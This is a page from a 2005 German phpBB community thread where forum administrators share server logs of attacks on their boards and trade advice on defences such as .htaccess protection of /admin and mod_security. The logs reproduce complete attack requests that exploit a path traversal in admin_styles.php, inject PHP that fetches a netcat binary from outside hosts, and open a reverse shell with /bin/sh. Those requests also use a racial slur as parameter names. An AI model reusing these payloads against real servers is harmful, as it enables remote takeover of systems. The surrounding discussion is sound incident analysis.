phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Wer oder was war das?

https://www.phpbb.de/community/viewtopic.php?t=81574

Seite 2 von 3

phpBB User id Auth. Bypass and "admin_styles" Code

Verfasst: 17.03.2005 16:54
von testit
Weitere Infos unter:
http://www.k-otik.com/exploits/20050314 ... xp.cpp.php

Code: Alles auswählen

62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)highlight=\%2527' => no                                                                                                                                                                                      
62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)rush=\%65\%63\%68' => n                                                                                                                                                                                      
62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)rush=echo' => not-match                                                                                                                                                                                      
62.211.199.89 - - [16/Mar/2005:14:47:24 +0100] RewriteCond: input='mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp
&sid=3e71233195f4756fe8b3dd1134a685a5&niggaip=62.211.199.89
&niggaport=6060&nigga=$a=fopen("http://img58.exs.cx/img58/1584/nc4hk.swf","r")
;$b="";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen("/tmp/.sess_","w");fwrite($a,$b);fclose($a);chmod("/tmp/.sess_",0777)
;system("/tmp/.sess_%20".$_REQUEST[niggaip]."%20".$_REQUEST[niggaport]."%20-e%20/bin/sh");' pattern='^(.*)wget\%20' => not-matche


Wie man sieht, versagen die üblichen rewrites. "system wird wohl nicht abgefangen, da kein "e" vor den verbreiteten Conditions steht.

Weiss jemand, ob die 2.0.13 auch gegen dieses Ding sicher ist? Nachdem, was ich gelesen habe, soll das Problem eigentlich nur bei PHP < 4.10.3 auftauchen. Ich habe aber 4.10.3.

Meiner Ansicht nach macht die ewige Hinterherrennerei nach neuen Updates fuer phpBB2 weniger Sinn als Abfang-Versuche auf niedrigerer Ebene, die sich dann auch bei anderen PHP-Applikationen positiv auswirken, bspw. "mod_security".

Ach ja, noch ein kleiner Hinweis: Wer Shell-Zugriff hat, sollte mal nach Prozessen Ausschau halten, die unter dem Apache-User laufen (i.d.R. www) und "ps" heissen ;-)


Nette Grüsse

testit

Verfasst: 23.03.2005 01:03
von Business
Hallo :)

Eine Frage, undzwar wurde mein Forum auch "angegriffen" auch dummerweise version 2.11, dachte da Update wär nich so wichtig :oops:

nun steht in den Logs:

Code: Alles auswählen

 
216.247.121.173 - - [22/Mar/2005:05:53:17 +0100] "GET / HTTP/1.1" 200 10920 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:21 +0100] "GET / HTTP/1.1" 200 12499 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:21 +0100] "GET /admin/admin_db_utilities.php?perform=backup&additional_tables=
&backup_type=structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=1e64fc017c26c87a0cf48ca19fe88925 HTTP/1.1" 200 13316 "http:// www . meinedomain.de/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:22 +0100] "POST /admin/admin_db_utilities.php?sid=1e64fc017c26c87a0cf48ca19fe88925 HTTP/1.1" 200 1393 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:23 +0100] "POST /admin/admin_styles.php?mode=export&sid=1e64fc017c26c87a0cf48ca19fe88925 HTTP/1.1" 200 15898 "http:// www . meinedomain.de/admin/admin_styles.php?mode=export" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.247.121.173 - - [22/Mar/2005:05:53:23 +0100] "GET /admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=
1e64fc017c26c87a0cf48ca19fe88925&niggaip=216.247.121.173&niggaport=22&nigga=$a=fopen
(\"http://overdose.tcpteam.org/background/nc.elf\",\"r\");$b=\"\";while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen
(\"/tmp/.sesss_\",\"w\");fwrite($a,$b);fclose($a);chmod(\"/tmp/.sesss_\",0777);system
(\"/tmp/.sesss_%20\".$_REQUEST[niggaip].\"%20\".$_REQUEST[niggaport].\"%20-e%20/bin/sh\"); HTTP/1.1" 200 10909 "http:// www . meinedomain.de" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Das Augenmerk liegt auf "backup", ist es möglich das die sich ein Datenbank Backup gemacht haben? :-?

Sonst ist nichts passiert, ausser das ein style nun aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp heisst :)

Verfasst: 23.03.2005 07:57
von DJBase
Ich hatte das gleiche Problem gestern in meinem Forum gehabt, allerdings habe ich 2.0.13 schon laufen?

Verfasst: 23.03.2005 09:35
von larsneo
dringende empfehlung (wie auch in den docs beschrieben) für alle versionen:
sichert den /admin folder durch eine zusätzliche .htaccess vor externem zugriff ab!

Verfasst: 23.03.2005 09:37
von Dave
~erledigt~
MfG
Dave

Verfasst: 23.03.2005 21:32
von RPS
Jup, und auch mein Board hatte heute das geleiche;
http://www.vgamers.de/phpbb/index.php

Alle Styles gelöcht, ein neuer namens FI Black und Fehler "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp"

Mein Board is noch auf 2.0.10 :oops:
Könnt ihr mir sagen was ich außer dem Upgraden noch machen muss?

Verfasst: 23.03.2005 21:50
von testit
RPS hat geschrieben:Jup, und auch mein Board hatte heute das geleiche;
http://www.vgamers.de/phpbb/index.php

Alle Styles gelöcht, ein neuer namens FI Black und Fehler "aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp"

Mein Board is noch auf 2.0.10 :oops:
Könnt ihr mir sagen was ich außer dem Upgraden noch machen muss?
Hi,

ausser den Updates noch eine .htaccess-Datei im Stammverzeichnis Deines Boards einstellen, wenn Dir das möglich ist:
http://www.phpbb.de/viewtopic.php?t=73948

Sicherstellten, dass die .htaccess auf "greift", d.h. dass der Webserver die .htaccess-Einstellungen auch einliest. Dieses Mechanismus kann nämlich auch abgeschaltet sein.

Wenn irgendwie möglich, solltest Du checken, ob auf Deinem Webserver Prozesse laufen, die da nicht hingehören (vor allem Perl-Prozesse). Es gibt auch Wurm-Varianten, die IRC-Server, SFTP und/oder ssh-Server auf dem Server durch den Wurm einschleussen, Diese müssen natürlich gekillt werden.

Gruss
testit

Verfasst: 09.06.2005 19:31
von derfreddy
bei mir wars das gleiche

nur war ich so neugierig, das leere template einzustellen
über dem mysteriösen nigga FI Black war nämlich noch eine auswahl, die nich benannt war

jedenfalls wird jetzt auf kein template mehr zugegriffen, sodass ich nichtmehr in den admin-bereich komme und folgende fehlermeldung erhalte..
phpBB : Kritischer Fehler

Could not open template config file

DEBUG MODE

Line : 1537
File : /var/www/free.fr/3/2/derfreddy/phpBB2/includes/functions.php
kann mir jemand sagen, wie ich das ursprüngliche template wieder einstelle?

Verfasst: 10.06.2005 18:00
von derfreddy
also ich möchte den style ändern, komm aber nichmehr in den administrationsbereich

hilfe bitte?

Verfasst: 10.06.2005 18:21
von pandorra
suchfunktion
Alle Zeiten sind UTC+02:00
Seite 2 von 3

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de